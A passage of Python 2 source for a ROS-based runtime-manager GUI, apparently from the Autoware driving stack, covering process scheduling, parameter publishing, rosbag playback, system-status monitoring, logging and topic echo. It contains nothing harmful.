self.update_depend_enable(pdic, gdic, prm)
d = self.cfg_dic( {'pdic':pdic, 'gdic':gdic, 'param':prm}, sys=True )
self.update_proc_cpu(d.get('obj'), d.get('pdic'), d.get('param'))
def update_proc_cpu(self, obj, pdic=None, prm=None):
if obj is None or not obj.GetValue():
return
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(obj)
if proc is None:
return
if pdic is None or prm is None:
(pdic, _, prm) = self.obj_to_pdic_gdic_prm(obj, sys=True)
cpu_chks = self.param_value_get(pdic, prm, 'cpu_chks')
cpu_chks = cpu_chks if cpu_chks else [ True for i in range(psutil.NUM_CPUS) ]
cpus = [ i for i in range(psutil.NUM_CPUS) if cpu_chks[i] ]
nice = self.param_value_get(pdic, prm, 'nice', 0)
d = { 'OTHER':SCHED_OTHER, 'FIFO':SCHED_FIFO, 'RR':SCHED_RR }
policy = SCHED_OTHER
priority = 0
if self.param_value_get(pdic, prm, 'real_time', False):
policy = d.get(self.param_value_get(pdic, prm, 'policy', 'FIFO'), SCHED_FIFO)
priority = self.param_value_get(pdic, prm, 'prio', 0)
procs = [ proc ] + proc.get_children(recursive=True)
for proc in procs:
print 'pid={}'.format(proc.pid)
if proc.get_nice() != nice:
print 'nice {} -> {}'.format(proc.get_nice(), nice)
if set_process_nice(proc, nice) is False:
print 'Err set_process_nice()'
if proc.get_cpu_affinity() != cpus:
print 'cpus {} -> {}'.format(proc.get_cpu_affinity(), cpus)
if set_process_cpu_affinity(proc, cpus) is False:
print 'Err set_process_cpu_affinity()'
policy_str = next( (k for (k,v) in d.items() if v == policy), '?')
print 'sched policy={} prio={}'.format(policy_str, priority)
if set_scheduling_policy(proc, policy, priority) is False:
print 'Err scheduling_policy()'
def param_value_get(self, pdic, prm, name, def_ret=None):
def_ret = self.param_default_value_get(prm, name, def_ret)
return pdic.get(name, def_ret) if pdic else def_ret
def param_default_value_get(self, prm, name, def_ret=None):
return next( (var.get('v') for var in prm.get('vars') if var.get('name') == name ), def_ret) \
if prm else def_ret
def update_depend_enable(self, pdic, gdic, prm):
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
depend = gdic_v.get('depend')
if depend is None:
continue
vp = gdic_v.get('var')
if vp is None:
continue
v = pdic.get(depend)
if v is None:
continue
depend_bool = eval( gdic_v.get('depend_bool', 'lambda v : bool(v)') )
v = depend_bool(v)
enables_set(vp, 'depend', v)
def publish_param_topic(self, pdic, prm):
pub = prm['pub']
klass_msg = globals()[ prm['msg'] ]
msg = klass_msg()
for (name, v) in pdic.items():
if prm.get('topic') == '/twist_cmd' and name == 'twist.angular.z':
v = -v
(obj, attr) = msg_path_to_obj_attr(msg, name)
if obj and attr in obj.__slots__:
type_str = obj._slot_types[ obj.__slots__.index(attr) ]
setattr(obj, attr, str_to_rosval(v, type_str, v))
if 'stamp' in prm.get('flags', []):
(obj, attr) = msg_path_to_obj_attr(msg, 'header.stamp')
setattr(obj, attr, rospy.get_rostime())
pub.publish(msg)
def rosparam_set(self, pdic, prm):
rosparams = None
for var in prm.get('vars', []):
name = var['name']
if 'rosparam' not in var or name not in pdic:
continue
rosparam = var['rosparam']
v = pdic.get(name)
v = str(v)
cvdic = { 'True':'true', 'False':'false' }
if v in cvdic:
v = cvdic.get(v)
if rosparams is None:
cmd = [ 'rosparam', 'list' ]
rosparams = subprocess.check_output(cmd).strip().split('\n')
nm = rosparam
nm = ('/' if len(nm) > 0 and nm[0] != '/' else '') + nm
exist = nm in rosparams
if exist:
cmd = [ 'rosparam', 'get', rosparam ]
ov = subprocess.check_output(cmd).strip()
if ov == v:
continue
elif v == '':
continue
cmd = [ 'rosparam', 'set', rosparam, v ] if v != '' else [ 'rosparam', 'delete', rosparam ]
print(cmd)
subprocess.call(cmd)
#
# Sensing Tab
#
def OnSensingDriver(self, event):
self.OnChecked_obj(event.GetEventObject())
def OnRosbagRecord(self, event):
self.dlg_rosbag_record.Show()
obj = event.GetEventObject()
set_val(obj, False)
def create_checkboxes(self, dic, panel, sizer, probe_dic, run_dic, bind_handler):
if 'name' not in dic:
return
obj = None
bdr_flg = wx.ALL
if 'subs' in dic:
lst = []
for d in dic['subs']:
self.create_checkboxes(d, panel, lst, probe_dic, run_dic, bind_handler)
if dic['name']:
obj = static_box_sizer(panel, dic.get('name'))
set_tooltip(obj.GetStaticBox(), dic)
else:
obj = wx.BoxSizer(wx.VERTICAL)
for (o, flg) in lst:
obj.Add(o, 0, wx.EXPAND | flg, 4)
else:
obj = wx.CheckBox(panel, wx.ID_ANY, dic['name'])
set_tooltip(obj, dic)
self.Bind(wx.EVT_CHECKBOX, bind_handler, obj)
bdr_flg = wx.LEFT | wx.RIGHT
if 'probe' in dic:
probe_dic[obj] = (dic['probe'], None)
if 'run' in dic:
run_dic[obj] = (dic['run'], None)
if 'param' in dic:
obj = self.add_config_link(dic, panel, obj)
else:
gdic = self.gdic_get_1st(dic)
self.add_cfg_info(obj, obj, dic.get('name'), None, gdic, False, None)
if sizer is not None:
sizer.append((obj, bdr_flg))
else:
panel.SetSizer(obj)
def add_config_link(self, dic, panel, obj):
cfg_obj = wx.HyperlinkCtrl(panel, wx.ID_ANY, '[config]', '')
fix_link_color(cfg_obj)
self.Bind(wx.EVT_HYPERLINK, self.OnConfig, cfg_obj)
add_objs = (obj, wx.StaticText(panel, wx.ID_ANY, ' '), cfg_obj)
hszr = sizer_wrap(add_objs, wx.HORIZONTAL)
name = dic['name']
pdic = self.load_dic_pdic_setup(name, dic)
gdic = self.gdic_get_1st(dic)
prm = self.get_param(dic.get('param'))
self.add_cfg_info(cfg_obj, obj, name, pdic, gdic, True, prm)
return hszr
def camera_ids(self):
if self.button_synchronization.GetValue():
return []
cmd = "rostopic list | sed -n 's|/image_raw||p' | sed 's/^$/\//'"
return subprocess.check_output(cmd, shell=True).strip().split()
def cam_id_to_obj(self, cam_id, v):
cam_id_obj = self.cfg_prm_to_obj( {'name':cam_id} )
if cam_id_obj is None:
cam_id_obj = StrValObj(cam_id, v)
cam_id_obj.SetValue(v)
return cam_id_obj
def camera_id_hook(self, args):
new_id = args.get('pdic', {}).get('camera_id', '')
ids = args.get('ids', [])
if new_id not in ids:
return
idx = ids.index(new_id)
pp = args.get('param_panel')
if pp:
pp.detach_func()
dlg = args.get('dlg')
if dlg:
dlg.EndModal(idx + 100)
def OnCalibrationPublisher(self, event):
obj = event.GetEventObject()
(_, gdic_org, prm) = self.obj_to_pdic_gdic_prm(obj)
if obj.GetValue():
gdic_org['ids'] = self.camera_ids()
ids = gdic_org.get('ids', [])
if ids == []:
self.OnLaunchKill(event)
return
#
# setup
#
(cmd_dic, cmd, _) = self.obj_to_cmd_dic_cmd_proc(obj)
flags = gdic_org.get('flags', [])[:] # copy
if 'open_dialog' in flags:
flags.remove('open_dialog')
pdic_baks = {}
for cam_id in ids:
(pdic_a, gdic_a, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic = pdic_a if pdic_a else self.load_dic_pdic_setup(cam_id, {})
pdic_baks[cam_id] = pdic.copy()
gdic = gdic_a if gdic_a else gdic_org.copy()
gdic['flags'] = flags
cam_id_obj = self.cam_id_to_obj(cam_id, obj.GetValue())
if not pdic_a or not gdic_a:
self.add_cfg_info(cam_id_obj, cam_id_obj, cam_id, pdic, gdic, False, prm)
if not cam_id_obj in cmd_dic:
cmd_dic[ cam_id_obj ] = (cmd, None)
var = self.get_var(prm, 'camera_id', {})
var['choices'] = ids
#
# Dialog
#
cam_id = ids[0]
while obj.GetValue():
(pdic, gdic, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic['camera_id'] = cam_id
dic_list_push(gdic, 'dialog_type', 'open2')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
gdic_v = dic_getset(gdic, 'camera_id', {})
args = { 'pdic':pdic, 'ids':ids, 'param_panel':gdic.get('param_panel'), 'dlg':dlg }
gdic_v['hook_var'] = { 'hook':self.camera_id_hook, 'args':args }
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
pdic['camera_id'] = cam_id # restore
if dlg_ret == 0: # OK
break
idx = dlg_ret - 100
if idx < 0 or len(ids) <= idx: # Cancel
for cam_id in ids:
(pdic, _, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic.update(pdic_baks.get(cam_id))
set_val(obj, False)
return
# Menu changed
cam_id = ids[idx]
#
# Launch / Kill
#
for cam_id in ids:
cam_id_obj = self.cfg_prm_to_obj( {'name':cam_id} )
(pdic, _, _) = self.obj_to_pdic_gdic_prm(cam_id_obj)
pdic['solo_camera'] = False
#print '@', cam_id, cam_id_obj.GetValue()
self.OnLaunchKill_obj(cam_id_obj)
#
# Simulation Tab
#
def rosbag_info_hook(self, v):
if not v:
return
th_start(self.rosbag_info_hook_th, {'v':v} )
def rosbag_info_hook_th(self, ev, v): # thread
err = subprocess.STDOUT
s = subprocess.check_output([ 'rosbag', 'info', v ], stderr=err).strip()
wx.CallAfter(self.label_rosbag_info.SetLabel, s)
wx.CallAfter(self.label_rosbag_info.GetParent().FitInside)
#
# Data Tab
#
#
# Stauts tab
#
def info_col(self, v, v_yellow, v_red, col_normal, col_red):
if v < v_yellow:
return col_normal
if v < v_red:
(nr,ng,nb) = col_normal
(rr,rg,rb) = col_red
return ( (nr+rr)/2, (ng+rg)/2, (nb+rb)/2 )
return col_red
def mem_kb_info(self):
lst = subprocess.check_output(['free']).strip().split('\n')[2].split()[2:4]
used = int(lst[0])
free = int(lst[1])
return (used + free, used)
def toprc_create(self):
(child_pid, fd) = pty.fork()
if child_pid == 0: # child
os.execvp('top', ['top'])
else: #parent
sec = 0.2
for s in ['1', 'c', 'W', 'q']:
time.sleep(sec)
os.write(fd, s)
def toprc_setup(self, toprc, backup):
if os.path.exists(toprc):
os.rename(toprc, backup)
self.toprc_create()
def toprc_restore(self, toprc, backup):
os.remove(toprc)
if os.path.exists(backup):
os.rename(backup, toprc)
# top command thread
def top_cmd_th(self, ev, setting, cpu_ibls, mem_ibl, toprc, backup):
interval = setting.get('interval', 3)
alert_level = setting.get('alert_level', {})
rate_per_cpu = alert_level.get('rate_per_cpu', 80)
rate_per_cpu_yellow = alert_level.get('rate_per_cpu_yellow', 80)
rate_cpu = alert_level.get('rate_cpu', 80)
rate_mem = alert_level.get('rate_mem', 80)
rate_mem_yellow = alert_level.get('rate_mem_yellow', 80)
for ibl in cpu_ibls:
ibl.lmt_bar_prg = rate_per_cpu
mem_ibl.lmt_bar_prg = rate_mem
alerted = False
cpu_n = psutil.NUM_CPUS
while not ev.wait(interval):
s = subprocess.check_output(['sh', '-c', 'env COLUMNS=512 top -b -n 2 -d 0.1']).strip()
i = s.rfind('\ntop -') + 1
s = s[i:]
wx.CallAfter(self.label_top_cmd.SetLabel, s)
wx.CallAfter(self.label_top_cmd.GetParent().FitInside)
k = '%Cpu'
fv_sum = 0
i = 0
for t in s.split('\n'):
if t[:len(k)] != k:
continue
lst = t[1:].split()
v = lst[1] if lst[1] != ':' else lst[2]
if v[0] == ':':
v = v[1:]
fv = str_to_float(v)
col = self.info_col(fv, rate_per_cpu_yellow, rate_per_cpu, (64,64,64), (200,0,0))
if i < cpu_n:
ibl = cpu_ibls[i]
wx.CallAfter(ibl.lb_set, v+'%', col)
wx.CallAfter(ibl.bar_set, int(fv))
fv_sum += fv
i += 1
k = 'KiB Mem:'
(total, used) = self.mem_kb_info()
rate = 100 * used / total
for u in [ 'KB', 'MB', 'GB', 'TB' ]:
if total <= 10 * 1024 or used <= 10:
break
total /= 1024
used /= 1024
col = self.info_col(rate, rate_mem_yellow, rate_mem, (64,64,64), (200,0,0))
tx = str(used) + u + '/' + str(total) + u + '(' + str(rate) + '%)'
wx.CallAfter(mem_ibl.lb_set, tx, col)
wx.CallAfter(mem_ibl.bar_set, rate)
is_alert = (fv_sum >= rate_cpu * cpu_n) or rate >= rate_mem
# --> for test
if os.path.exists('/tmp/alert_test_on'):
is_alert = True
if os.path.exists('/tmp/alert_test_off'):
is_alert = False
# <-- for test
if is_alert and not alerted:
thinf = th_start(self.alert_th, {'bgcol':(200,50,50)})
alerted = True
if not is_alert and alerted:
th_end(thinf)
alerted = False
# top5
i = s.find('\n\n') + 2
lst = s[i:].split('\n')
hd = lst[0]
top5 = lst[1:1+5]
i = hd.rfind('COMMAND')
cmds = [ line[i:].split(' ')[0] for line in top5 ]
i = hd.find('%CPU')
loads = [ line[i-1:].strip().split(' ')[0] for line in top5 ]
for (lb, cmd, load) in zip(self.lb_top5, cmds, loads):
col = self.info_col(str_to_float(load), rate_per_cpu_yellow, rate_per_cpu, (64,64,64), (200,0,0))
wx.CallAfter(lb.SetForegroundColour, col)
wx.CallAfter(lb.SetLabel, cmd + ' (' + load + ' %CPU)')
self.toprc_restore(toprc, backup)
def alert_th(self, bgcol, ev):
wx.CallAfter(self.RequestUserAttention)
c = bgcol
o = wx.NullColour
while not ev.wait(0.5):
for col in [ c, o, c, o, c, o ]:
wx.CallAfter(self.set_bg_all_tabs, col)
time.sleep(0.05)
def log_th(self, file, que, ev):
while not ev.wait(0):
s = file.readline()
if not s:
break
que.put(s)
def logout_th(self, que, interval, tc, ev):
if que == self.log_que_stdout or que == self.log_que_stderr:
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
self.log_que.put(s)
if interval <= 0:
continue
ckbox = self.checkbox_stdout if que == self.log_que_stdout else self.checkbox_stderr
if ckbox.GetValue():
self.log_que_show.put( cut_esc(s) )
else: # == self.log_que
f = None
path = self.status_dic.get('log_path')
is_syslog = (path == 'syslog')
if is_syslog:
ident = sys.argv[0].split('/')[-1]
syslog.openlog(ident, syslog.LOG_PID | syslog.LOG_CONS)
elif path:
path = os.path.expandvars(os.path.expanduser(path))
f = open(path, 'a') if path else None
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
print s.strip()
sys.stdout.flush()
s = cut_esc(s)
if is_syslog:
syslog.syslog(s)
elif f:
f.write(s)
f.flush()
if is_syslog:
syslog.closelog()
if f:
f.close()
def logshow_th(self, que, interval, tc, ev):
while not ev.wait(interval):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
wx.CallAfter(append_tc_limit, tc, s)
# que clear
if self.checkbox_stdout.GetValue() is False and \
self.checkbox_stderr.GetValue() is False and \
que.qsize() > 0:
que_clear(que)
wx.CallAfter(tc.Clear)
#
# for Topics tab
#
def OnRefreshTopics(self, event):
self.refresh_topics_list()
def refresh_topics_list(self):
lst = subprocess.check_output([ 'rostopic', 'list' ]).strip().split('\n')
panel = self.panel_topics_list
szr = self.sizer_topics_list
for obj in self.topics_list:
szr.Remove(obj)
obj.Destroy()
self.topics_list = []
for topic in lst:
obj = wx.HyperlinkCtrl(panel, wx.ID_ANY, topic, '')
self.Bind(wx.EVT_HYPERLINK, self.OnTopicLink, obj)
szr.Add(obj, 0, wx.LEFT, 4)
fix_link_color(obj)
self.topics_list.append(obj)
szr.Layout()
panel.SetVirtualSize(szr.GetMinSize())
# info clear
lb = self.label_topics_info
lb.SetLabel('')
# echo clear
self.topics_proc_th_end()
# wait que clear
while self.topics_echo_que.qsize() > 0:
time.sleep(0.1)
tc = self.text_ctrl_topics_echo
tc.Enable(False)
wx.CallAfter(tc.Clear)
wx.CallAfter(tc.Enable, True)
self.topics_echo_sum = 0
self.topic_echo_curr_topic = None
def OnEcho(self, event):
if self.checkbox_topics_echo.GetValue() and self.topic_echo_curr_topic:
self.topics_proc_th_start(self.topic_echo_curr_topic)
else:
self.topics_proc_th_end()
def OnTopicLink(self, event):
obj = event.GetEventObject()
topic = obj.GetLabel()
self.topic_echo_curr_topic = topic
# info
info = subprocess.check_output([ 'rostopic', 'info', topic ]).strip()
lb = self.label_topics_info
lb.SetLabel(info)
lb.GetParent().FitInside()
# echo
self.topics_proc_th_end()
if self.checkbox_topics_echo.GetValue():
self.topics_proc_th_start(topic)
def topics_proc_th_start(self, topic):
out = subprocess.PIPE
err = subprocess.STDOUT
self.topics_echo_proc = psutil.Popen([ 'rostopic', 'echo', topic ], stdout=out, stderr=err)
self.topics_echo_thinf = th_start(self.topics_echo_th)
def topics_proc_th_end(self):
thinf = self.topics_echo_thinf
if thinf:
th_end(thinf)
self.topics_echo_thinf = None
proc = self.topics_echo_proc
if proc:
terminate_children(proc)
terminate(proc)
#proc.wait()
self.topics_echo_proc = None
def topics_echo_th(self, ev):
if not self.topics_echo_proc:
return
file = self.topics_echo_proc.stdout
fl = fcntl.fcntl(file.fileno(), fcntl.F_GETFL)
fcntl.fcntl(file.fileno(), fcntl.F_SETFL, fl | os.O_NONBLOCK)
while not ev.wait(0):
try:
s = file.read(1)
except:
continue
if not s:
break
if self.checkbox_topics_echo.GetValue():
self.topics_echo_que.put(s)
que_clear(self.topics_echo_que)
def topics_echo_show_th(self, ev):
que = self.topics_echo_que
interval = self.topics_dic.get('gui_update_interval_ms', 100) * 0.001
chars_limit = self.topics_dic.get('gui_chars_limit', 10000)
tc = self.text_ctrl_topics_echo
while not ev.wait(interval):
qsz = que.qsize()
if qsz <= 0:
continue
if qsz > chars_limit:
over = qsz - chars_limit
for i in range(over):
try:
que.get(timeout=1)
except Queue.Empty:
break
qsz = chars_limit
arr = []
for i in range(qsz):
try:
s = que.get(timeout=1)
except Queue.Empty:
s = ''
arr.append(s)
s = ''.join(arr)
self.topics_echo_sum += len(s)
rm_chars = 0
if self.topics_echo_sum > chars_limit:
rm_chars = self.topics_echo_sum - chars_limit
self.topics_echo_sum = chars_limit
if self.checkbox_topics_echo.GetValue():
wx.CallAfter(append_tc_limit, tc, s, rm_chars)
#
# Common Utils
#
def set_param_panel(self, obj, parent):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
panel = ParamPanel(parent, frame=self, pdic=pdic, gdic=gdic, prm=prm)
sizer_wrap((panel,), wx.VERTICAL, 0, wx.EXPAND, 0, parent)
k = 'ext_toggle_enables'
gdic[ k ] = gdic.get(k, []) + [ panel ]
def obj_to_varpanel(self, obj, var_name):
gdic = self.obj_to_gdic(obj, {})
return gdic.get(var_name, {}).get('var')
def obj_to_varpanel_tc(self, obj, var_name):
vp = self.obj_to_varpanel(obj, var_name)
return vp.tc if vp and vp.tc else None
def OnConfig(self, event):
self.OnHyperlinked_obj(event.GetEventObject())
def add_params(self, params):
for prm in params:
if 'topic' in prm and 'msg' in prm:
klass_msg = globals()[ prm['msg'] ]
prm['pub'] = rospy.Publisher(prm['topic'], klass_msg, latch=True, queue_size=10)
self.params += params
def gdic_get_1st(self, dic):
gdic = dic.get('gui', {})
gdic['update_func'] = self.update_func
return gdic
def add_cfg_info(self, cfg_obj, obj, name, pdic, gdic, run_disable, prm):
self.config_dic[ cfg_obj ] = { 'obj':obj , 'name':name , 'pdic':pdic , 'gdic':gdic,
'run_disable':run_disable , 'param':prm }
def get_param(self, prm_name):
return next( (prm for prm in self.params if prm['name'] == prm_name), None)
def get_var(self, prm, var_name, def_ret=None):
return next( (var for var in prm.get('vars') if var.get('name') == var_name), def_ret)
def obj_to_cmd_dic(self, obj):
return next( (cmd_dic for cmd_dic in self.all_cmd_dics if obj in cmd_dic), None)
def obj_to_cmd_dic_cmd_proc(self, obj):
cmd_dic = self.obj_to_cmd_dic(obj)
if cmd_dic is None:
return (None, None, None)
(cmd, proc) = cmd_dic.get(obj, (None, None))
return (cmd_dic, cmd, proc)
def OnLaunchKill(self, event):
self.OnLaunchKill_obj(event.GetEventObject())
def OnLaunchKill_obj(self, obj):
self.alias_sync(obj)
obj = self.alias_grp_top_obj(obj)
v = obj.GetValue()
add_args = self.obj_to_add_args(obj, msg_box=v) # no open dialog at kill
if add_args is False:
set_val(obj, not v)
return
(cmd_dic, _, proc_bak) = self.obj_to_cmd_dic_cmd_proc(obj)
self.launch_kill_proc(obj, cmd_dic, add_args=add_args)
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(obj)
if proc != proc_bak:
self.toggle_enable_obj(obj)
if proc:
self.update_proc_cpu(obj)
def OnRosbagPlay(self, event):
obj = event.GetEventObject()
play = self.button_play_rosbag_play
stop = self.button_stop_rosbag_play
pause = self.button_pause_rosbag_play
(_, _, prm) = self.obj_to_pdic_gdic_prm(play)
var = self.get_var(prm, 'sim_time', {})
if obj == play:
var['v'] = True
self.OnLaunchKill_obj(play)
button_color_change(play)
set_val(stop, False)
set_val(pause, False)
elif obj == stop:
set_val(stop, True)
set_val(play, False)
set_val(pause, False)
var['v'] = False
self.OnLaunchKill_obj(play)
button_color_change(stop)
elif obj == pause:
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(play)
if proc:
proc.stdin.write(' ')
def OnFtrace(self, event):
obj = event.GetEventObject()
cmd = 'rosrun runtime_manager ftrace.py'
v = obj.GetValue()
self.ftrace_proc_ = self.launch_kill(v, cmd,
None if v else self.ftrace_proc_, obj=obj)
def stdout_file_search(self, file, k):
s = ''
while True:
c = file.read(1)
if not c:
return None
if c != '\r' and c != '\n':
s += c
continue
s = s.strip()
if k in s:
break
s = ''
i = s.find(k) + len(k)
return s[i:]
# thread
def point_cloud_progress_bar(self, file, ev):
obj = self.button_point_cloud
(pdic, _, _) = self.obj_to_pdic_gdic_prm(obj)
n = len(pdic.get('path_pcd', '').split(','))
if n == 0:
return
i = 0
while not ev.wait(0):
s = self.stdout_file_search(file, 'load ')
if not s:
break
err_key = 'failed '
if s[:len(err_key)] != err_key:
i += 1
else:
i -= 1
print s
wx.CallAfter(self.label_point_cloud_bar.set, 100 * i / n)
wx.CallAfter(self.label_point_cloud_bar.clear)
# thread
def rosbag_play_progress_bar(self, file, ev):
while not ev.wait(0):
s = self.stdout_file_search(file, 'Duration:')
if not s:
break
lst = s.split()
pos = str_to_float(lst[0])
# lst[1] is '/'
total = str_to_float(lst[2])
if total == 0:
continue
prg = int(100 * pos / total + 0.5)
pos = str(int(pos))
total = str(int(total))
wx.CallAfter(self.label_rosbag_play_bar.set, prg)
wx.CallAfter(self.label_rosbag_play_pos.SetLabel, pos)
wx.CallAfter(self.label_rosbag_play_total.SetLabel, total)
wx.CallAfter(self.label_rosbag_play_bar.clear)
wx.CallAfter(self.label_rosbag_play_pos.SetLabel, '')
wx.CallAfter(self.label_rosbag_play_total.SetLabel, '')
def alias_sync(self, obj, v=None):
en = None
if getattr(obj, 'IsEnabled', None):
(key, en) = enables_get_last(obj)
if not key:
en = obj.IsEnabled()
grp = self.alias_grp_get(obj)
if getattr(obj, 'GetValue', None):
v = obj.GetValue()
for o in grp:
if o is obj:
continue
if en is not None and o.IsEnabled() != en and not self.is_toggle_button(o):
if key:
enable_set(o, key, en)
else:
o.Enable(en)
if v is not None and getattr(o, 'SetValue', None):
set_val(o, v)
if getattr(o, 'SetInsertionPointEnd', None):
o.SetInsertionPointEnd()
def alias_grp_top_obj(self, obj):
return get_top(self.alias_grp_get(obj), obj)
def alias_grp_get(self, obj):
return next( (grp for grp in self.alias_grps if obj in grp), [])
def create_tree(self, parent, items, tree, item, cmd_dic):
name = items.get('name', '')
if tree is None:
style = wx.TR_HAS_BUTTONS | wx.TR_NO_LINES | wx.TR_HIDE_ROOT | wx.TR_DEFAULT_STYLE | wx.SUNKEN_BORDER
tree = CT.CustomTreeCtrl(parent, wx.ID_ANY, agwStyle=style)
item = tree.AddRoot(name, data=tree)
tree.Bind(wx.EVT_MOTION, self.OnTreeMotion)
else:
ct_type = 1 if 'cmd' in items else 0 # 1:checkbox type
item = tree.AppendItem(item, name, ct_type=ct_type)
if 'desc' in items:
item.SetData(items.get('desc'))
if 'cmd' in items:
cmd_dic[item] = (items['cmd'], None)
pdic = self.load_dic_pdic_setup(name, items)
pnl = wx.Panel(tree, wx.ID_ANY)
add_objs = []
self.new_link(item, name, pdic, self.sys_gdic, pnl, 'sys', 'sys', add_objs)
gdic = self.gdic_get_1st(items)
if 'param' in items:
self.new_link(item, name, pdic, gdic, pnl, 'app', items.get('param'), add_objs)
else:
self.add_cfg_info(item, item, name, None, gdic, False, None)
szr = sizer_wrap(add_objs, wx.HORIZONTAL, parent=pnl)
szr.Fit(pnl)
tree.SetItemWindow(item, pnl)
for sub in items.get('subs', []):
self.create_tree(parent, sub, tree, item, cmd_dic)
return tree
def new_link(self, item, name, pdic, gdic, pnl, link_str, prm_name, add_objs):
lkc = None
if 'no_link' not in gdic.get('flags', []):
lkc = wx.HyperlinkCtrl(pnl, wx.ID_ANY, link_str, "")
fix_link_color(lkc)
self.Bind(wx.EVT_HYPERLINK, self.OnHyperlinked, lkc)
if len(add_objs) > 0:
add_objs += [ wx.StaticText(pnl, wx.ID_ANY, ' ') ]
add_objs += [ wx.StaticText(pnl, wx.ID_ANY, '['), lkc, wx.StaticText(pnl, wx.ID_ANY, ']') ]
prm = self.get_param(prm_name)
self.add_cfg_info(lkc if lkc else item, item, name, pdic, gdic, False, prm)
def load_dic_pdic_setup(self, name, dic):
name = dic.get('share_val', dic.get('name', name))
pdic = self.load_dic.get(name, {})
self.load_dic[ name ] = pdic
return pdic
def launch_kill_proc(self, obj, cmd_dic, add_args=None):
if obj not in cmd_dic:
set_val(obj, False)
print('not implemented.')
return
v = obj.GetValue()
(cmd, proc) = cmd_dic[obj]
if not cmd:
set_val(obj, False)
proc = self.launch_kill(v, cmd, proc, add_args, obj=obj)
(cfg_obj, dic) = self.cfg_obj_dic( {'obj':obj} )
if cfg_obj and dic.get('run_disable'):
cfg_obj.Enable(not v)
cmd_dic[obj] = (cmd, proc)
if not v:
self.stat_label_off(obj)
def proc_to_cmd_dic_obj(self, proc):
for cmd_dic in self.all_cmd_dics:
obj = next( (obj for (obj, v) in cmd_dic.items() if proc in v), None)
if obj:
return (cmd_dic, obj)
return (None, None)
def launch_kill(self, v, cmd, proc, add_args=None, sigint=None, obj=None, kill_children=None):
msg = None
msg = 'already launched.' if v and proc else msg
msg = 'already terminated.' if not v and proc is None else msg
msg = 'cmd not implemented.' if not cmd else msg
if msg is not None:
print(msg)
return proc
if v:
args = shlex.split(cmd)
if add_args:
args += add_args
print(args) # for debug
f = self.obj_to_gdic(obj, {}).get('stdout_func')
f = eval_if_str(self, f)
f = f if f else self.log_th
out = subprocess.PIPE if f else None
err = subprocess.STDOUT if f else None
if f == self.log_th:
err = subprocess.PIPE
proc = psutil.Popen(args, stdin=subprocess.PIPE, stdout=out, stderr=err)
self.all_procs.append(proc)
if f == self.log_th:
thinf = th_start(f, {'file':proc.stdout, 'que':self.log_que_stdout})
self.all_th_infs.append(thinf)
thinf = th_start(f, {'file':proc.stderr, 'que':self.log_que_stderr})
self.all_th_infs.append(thinf)
elif f:
thinf = th_start(f, {'file':proc.stdout})
self.all_th_infs.append(thinf)
else:
flags = self.obj_to_gdic(obj, {}).get('flags', [])
if sigint is None:
sigint = 'SIGTERM' not in flags
if kill_children is None:
kill_children = 'kill_children' in flags
if kill_children:
terminate_children(proc, sigint)
terminate(proc, sigint)
proc.wait()
if proc in self.all_procs:
self.all_procs.remove(proc)
proc = None
return proc
def roslaunch_to_nodes(self, cmd):
try:
s = subprocess.check_output(cmd).strip()
return s.split('\n') if s != '' else []
except subprocess.CalledProcessError:
return []
def set_bg_all_tabs(self, col=wx.NullColour):
add_pnls = [
self,
self.tree_ctrl_0,
self.tree_ctrl_1,
self.tree_ctrl_data ]
for tab in self.all_tabs + add_pnls:
tab.SetBackgroundColour(col)
def get_autoware_dir(self):
dir = rtmgr_src_dir() + '../../../../../../'
return os.path.abspath(dir)
def load_yaml(self, filename, def_ret=None):
return load_yaml(filename, def_ret)
def toggle_enable_obj(self, obj):
objs = []
pfs = [ 'button_play_', 'button_stop_', 'button_pause_',
'button_ref_', 'text_ctrl_' ]
key = self.obj_key_get(obj, pfs)
if key:
objs += self.key_objs_get(pfs, key)
gdic = self.obj_to_gdic(obj, {})
objs += [ eval_if_str(self, e) for e in gdic.get('ext_toggle_enables', []) ]
self.toggle_enables(objs)
def toggle_enables(self, objs):
for obj in objs:
if getattr(obj, 'IsEnabled', None):
en = enables_get(obj, 'toggle', obj.IsEnabled())
enables_set(obj, 'toggle', not en)
self.alias_sync(obj)
def is_toggle_button(self, obj):
return self.name_get(obj).split('_')[0] == 'button' and getattr(obj, 'GetValue', None)
def obj_name_split(self, obj, pfs):
name = self.name_get(obj)
if name is None:
return (None, None)
return next( ( ( name[:len(pf)], name[len(pf):] ) for pf in pfs if name[:len(pf)] == pf ), None)
def obj_key_get(self, obj, pfs):
name = self.name_get(obj)
if name is None:
return None
return next( (name[len(pf):] for pf in pfs if name[:len(pf)] == pf), None)
def key_objs_get(self, pfs, key):
return [ self.obj_get(pf + key) for pf in pfs if self.obj_get(pf + key) ]
def name_get(self, obj):
return next( (nm for nm in dir(self) if getattr(self, nm) is obj), None)
def name_get_cond(self, obj, cond=(lambda s : True), def_ret=None):
return next( (nm for nm in dir(self) if cond(nm) and getattr(self, nm) is obj), def_ret)
def val_get(self, name):
obj = self.obj_get(name)
if obj is None:
return None
return obj.GetValue() if getattr(obj, 'GetValue', None) else None
def obj_get(self, name):
return getattr(self, name, None)
def gdic_dialog_type_chk(gdic, name):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
tail = '_dialog_only'
lst = [ (k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail ]
only_chk = next( (False for (k,type) in lst if type != dlg_type and name in gdic.get(k, [])), True)
tail = '_dialog_allow'
lst = [ (k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail ]
allow_chk = next( (False for (k,type) in lst if type == dlg_type and name not in gdic.get(k, [])), True)
return only_chk and allow_chk
def gdic_dialog_name_get(gdic):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
